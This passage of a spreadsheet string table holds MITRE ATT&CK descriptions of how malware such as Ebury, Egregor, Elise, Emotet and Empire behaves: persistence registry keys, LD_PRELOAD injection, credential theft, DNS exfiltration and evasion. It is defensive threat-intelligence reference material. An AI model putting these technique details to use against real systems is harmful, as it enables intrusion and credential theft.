    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture screenshots and store them locally.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can use [cmd](https://attack.mitre.org/software/S0106) to execute commands on a victim’s machine.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is capable of performing directory listings.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is capable of performing process listings.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) uses HTTP for command and control.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can upload files over the C2 channel from the infected host.(Citation: Prevailion EvilNum May 2020) </t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has a function called "DeleteLeftovers" to remove certain artifacts of the attack.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can download and upload files to the victim's computer.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can make modifications to the Regsitry for persistence.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used a one-way communication method via GitLab and Digital Point to perform C2.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can achieve persistence through the Registry Run key.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can run a remote scriptlet that drops a file and executes it via regsvr32.exe.(Citation: ESET EvilNum July 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can execute commands and scripts through rundll32.(Citation: Prevailion EvilNum May 2020) </t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can search for anti-virus products on the system.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can harvest cookies and upload them to the C2 server.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the computer name from the victim's system.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the username from the victim's machine.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has changed the creation date of files.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can automatically exfiltrate gathered SSH credentials.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has installed a self-signed RPM package mimicking the original system package on RPM based systems.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has been embedded into modified OpenSSH binaries to gain persistent access to SSH credential information.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used DNS requests over UDP port 53 for C2.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can disable SELinux Role-Based Access Control and deactivate PAM modules.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used a DGA to generate a domain name for C2.(Citation: ESET Ebury Feb 2014)(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has injected its dynamic library into descendent processes of sshd via LD_PRELOAD.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can exfiltrate SSH credentials through custom DNS queries.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) can list directory entries.(Citation: ESET Ebury Oct 2017) </t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can hook logging functions so that nothing from the backdoor gets sent to the logging facility.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can intercept private keys using a trojanized &lt;code&gt;ssh-add&lt;/code&gt; function.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has obfuscated its strings with a simple XOR encryption with a static key.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can deactivate PAM modules to tamper with the sshd configuration.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has intercepted unencrypted private keys as well as private key pass-phrases.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used Python to implement its DGA.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used user mode rootkit techniques to remain hidden on the system.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has encoded C2 traffic in hexadecimal format.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used BITSadmin to download and execute malicious DLLs.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used DLL side-loading to execute its payload.(Citation: Cyble Egregor Oct 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) can collect any files found in the enumerated drivers before sending it to its C2 channel.(Citation: NHS Digital Egregor Nov 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has been decrypted before execution.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has disabled Windows Defender to evade protections.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can conduct Active Directory reconnaissance using tools such as Sharphound or [AdFind](https://attack.mitre.org/software/S0552).(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can modify the GPO to evade detection.(Citation: Cybereason Egregor Nov 2020) (Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has the ability to download files from its C2 server.(Citation: Cybereason Egregor Nov 2020)(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has masqueraded the svchost.exe process to exfiltrate data.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used the Windows API to make detection more difficult.(Citation: Cyble Egregor Oct 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used an encoded PowerShell command by a service created by [Cobalt Strike](https://attack.mitre.org/software/S0154) for lateral movement.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can inject its payload into iexplore.exe process.(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used regsvr32.exe to execute malicious DLLs.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has checked for the LogMein event log in an attempt to encrypt files in remote machines.(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used rundll32 during execution.(Citation: Cybereason Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554)'s payloads are custom-packed, archived and encrypted to prevent analysis.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can perform a language check of the infected system and can query the CPU information (cupid).(Citation: JoeSecurity Egregor 2020)(Citation: NHS Digital Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can enumerate all connected drives.(Citation: NHS Digital Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used tools to gather information about users.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) contains functionality to query the local/system time.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can perform a  long sleep (greater than or equal to 3 minutes) to evade detection.(Citation: JoeSecurity Egregor 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.(Citation: Cyble Egregor Oct 2020)(Citation: NHS Digital Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has communicated with its C2 servers via HTTPS protocol.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used batch files for execution and can launch Internet Explorer from cmd.exe.(Citation: JoeSecurity Egregor 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) injects DLL files into iexplore.exe.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) is capable of launching a remote shell on the host to delete itself.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>A variant of [Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;dir C:\progra~1&lt;/code&gt; when initially run.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) can download additional files from the C2 server for execution.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net user&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) creates a file in &lt;code&gt;AppData\Local\Microsoft\Windows\Explorer&lt;/code&gt; and stores all harvested data in that file.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>If installing itself as a service fails, [Elise](https://attack.mitre.org/software/S0081) instead writes itself as a file named svchost.exe saved in %APPDATA%\Microsoft\Network.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) encrypts several of its files, including configuration files.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) enumerates processes via the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>If establishing persistence by installation as a new service fails, one variant of [Elise](https://attack.mitre.org/software/S0081) establishes persistence for the created .exe file by setting the following Registry key: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost : %APPDATA%\Microsoft\Network\svchost.exe&lt;/code&gt;. Other variants have set the following Registry keys for persistence: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\imejp : [self]&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAStorD&lt;/code&gt;.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>After copying itself to a DLL file, a variant of [Elise](https://attack.mitre.org/software/S0081) calls the DLL file using rundll32.exe.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) exfiltrates data using cookie values that are Base64-encoded.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) encrypts exfiltrated data with RC4.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;systeminfo&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;ipconfig /all&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net start&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) performs timestomping of a CAB file it creates.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) communicates over HTTP or HTTPS for C2.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) configures itself as a service.(Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>A variant of [Emissary](https://attack.mitre.org/software/S0082) appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) injects its DLL file into a newly spawned Internet Explorer process.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to download files from the C2 server.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net localgroup administrators&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions.(Citation: Lotus Blossom Dec 2015)(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) have added Run Registry keys to establish persistence.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>Variants of [Emissary](https://attack.mitre.org/software/S0082) have used rundll32.exe in Registry values added to establish persistence.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>The C2 server response to a beacon sent by a variant of [Emissary](https://attack.mitre.org/software/S0082) contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of [Emissary](https://attack.mitre.org/software/S0082) use various XOR operations to encrypt C2 data.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute ver, systeminfo, and gpresult commands.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;ipconfig /all&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net start&lt;/code&gt; to interact with services.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) uses HTTP or HTTPS for C2.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) has the capability to create a remote shell and execute specified commands.(Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) is capable of configuring itself as a service.(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed encrypting the data it collects before sending it to the C2 server. (Citation: Fortinet Emotet May 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) is known to use RSA keys for encrypting C2 traffic. (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. (Citation: US-CERT Emotet Jul 2018)(Citation: CIS Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping browser password grabber modules. (Citation: Trend Micro Emotet Jan 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed injecting in to Explorer.exe and other processes. (Citation: Picus Emotet Dec 2018)(Citation: Trend Micro Banking Malware Jan 2019)(Citation: US-CERT Emotet Jul 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that can scrape email addresses from Outlook.(Citation: CIS Emotet Dec 2018)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers. (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation. (Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: Red Canary Emotet Feb 2019) </t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping password grabber modules including [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) can brute force a local admin password, then use it to facilitate lateral movement.(Citation: Malwarebytes Emotet Dec 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that scrapes email data from Outlook.(Citation: CIS Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious link delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed to hook network APIs to monitor network traffic. (Citation: Trend Micro Banking Malware Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.(Citation: Talos Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has obfuscated macros within malicious documents to hide the URLs hosting the malware,  CMD.exe arguments, and PowerShell scripts. (Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: ESET Emotet Dec 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been observed using a hard coded list of passwords to brute force user accounts. (Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: CIS Emotet Dec 2018) </t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used Powershell to retrieve the malicious payload and download additional resources like [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Symantec Emotet Jul 2018)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Red Canary Emotet Feb 2019)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed enumerating local processes.(Citation: ASEC Emotet 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed adding the downloaded payload to the &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key to maintain persistence.(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) leverages the Admin$ share for lateral movement once the local admin password has been brute forced. (Citation: Malwarebytes Emotet Dec 2017) </t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has maintained persistence through a scheduled task. (Citation: US-CERT Emotet Jul 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used custom packers to protect its payloads.(Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing attachments. (Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing links. (Citation: Trend Micro Banking Malware Jan 2019)(Citation: Kaspersky Emotet Jan 2019)(Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Talos Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads. (Citation: Symantec Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used cmd.exe to run a PowerShell script. (Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used WMI to execute powershell.exe.(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been observed creating new services to maintain persistence. (Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018) </t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; to manipulate access tokens.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can ZIP directories on the target system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use TLS to encrypt its C2 channel.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Dropbox and GitHub for C2.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to gather browser data such as bookmarks and visited sites.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules to attempt to bypass UAC for escalation of privileges.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can harvest clipboard data on both Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) uses a command-line interface to interact with systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;Invoke-RunAs&lt;/code&gt; to make tokens.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains some modules that leverage API hooking to carry out tasks, such as netripper.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use various modules to search for files containing passwords.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use modules that extract passwords from common web browsers such as Firefox and Chrome.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit various DLL hijacking opportunities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can utilize &lt;code&gt;Invoke-DCOM&lt;/code&gt; to leverage remote COM execution for lateral movement.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire local and domain user account information.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a module for creating a new domain user if permissions allow.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules for enumerating domain trusts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a dylib hijacker module that generates a malicious dylib given the path to a legitimate dylib of a vulnerable application.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can send data gathered from a target through the command and control channel.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Dropbox for data exfiltration.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use GitHub for data exfiltration.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can exploit vulnerabilities such as MS16-032 and MS16-135.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules for finding files of interest on hosts and network shares.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use golden tickets.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
